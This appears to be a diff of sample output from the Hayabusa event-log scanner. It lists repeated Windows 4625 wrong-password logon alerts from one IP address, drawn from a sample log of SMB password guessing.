+2016-09-20 01:50:29.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zELW2Upo3jRCIqJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfcyJGLYmu93JBIL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3t2nKPZHZvcXM3QA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:29.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oiDRonqdEM2YJvz9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wJPF4GUypkDkTz56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cd5YRVIoXx8LoYpK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.106 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H49I2Xp2Gz1Jj0Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMSWWzskoRfYBGny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GLm2PolKMBsYkPnN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ZjHWhG2rXzYWskz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FOZzVedHYODB5Yvd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVaRybjI4HdZV0Zs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tTcl30MvvycjFcQb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fVZqbCr9EwmV4gNE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zVwhii0TVmCkpDI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Tx04CPPVa6WYY9G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gHyefIGqhIIy3ZI9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wrietoh4wgXcEvNd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9WW0Y5PW2JfCCdyR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmXsMJ0ELK4qiNY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeftUqriSoxCgmDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60JE9WQQ8N00j65B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0rt2yVAEH6V4IIS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pay98C2Gr1di7qQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8TyPDYm9QCAmqj7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Dw3iK7DQMVXy8LW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BMuO0QEkxpKRv4Vl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RaHECaQDXCXQc9Xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ewXT2VcARiaNLIxJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGSTrm4AOojs7So0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wVTBSk0Q65LkaTqg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NjFN51w3T4VwuWa5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KG7a88h48ZEyOuYw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ksKuTSGukc5em3B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPEMcGV6ZR92sWNY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iBQ6sKrRjb7BsySN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gDFnG1gv7jOeIQ0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdFKkcNpkfAScnkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IAYbV4ioewwkZSmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bQ2Dxd6nlgSXJpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: havLyoVCfdCqzrqO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b2vZLhz19pXrq9iE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4TSN93DrSWb1ah4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QwFyrxiceLRTD9rI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARbqo84Mr5T3ltRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34HpQJO17IDWber9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bSSbqOtdSeH58oIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EMvTo7fU6J468WE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8gzx6Vr9LoInM1df | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwXC2S4HwdwNE6SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pQa1WxSt3bj9LEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fm65jq9tRQznmWPh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd8BJbXvEoaDADLc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P0JlFw7S6jFUt4Iy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rfMbFXQcP5sA2wmf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xu4pgyCcDjl9h0Et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B00w8dZG3sT2Lsqo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8aKGq6qrchp4SLvT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnScYHBCKOSHItsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r8UMBM326M7a4njd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kTdYWOi6p7etRfya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JWSlcEVzj5lGtVg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xc77wukLTPOYAzj2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w4WmTwTGuwDN6YXn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aeN4cSffFA04oOje | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eYFPV1kGALqX8jyO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qIlhxT4qqo5bCsU3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: btoOskH0112h7MTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nWUhQJBcS7XbMJUq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E70qmXDDWqmWJjyU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oX0L8wf6nt2grLvn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0D8BwniiXsjfkYqE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sSWYo4mphuvKHQHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: im8an1mDle9f8skd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
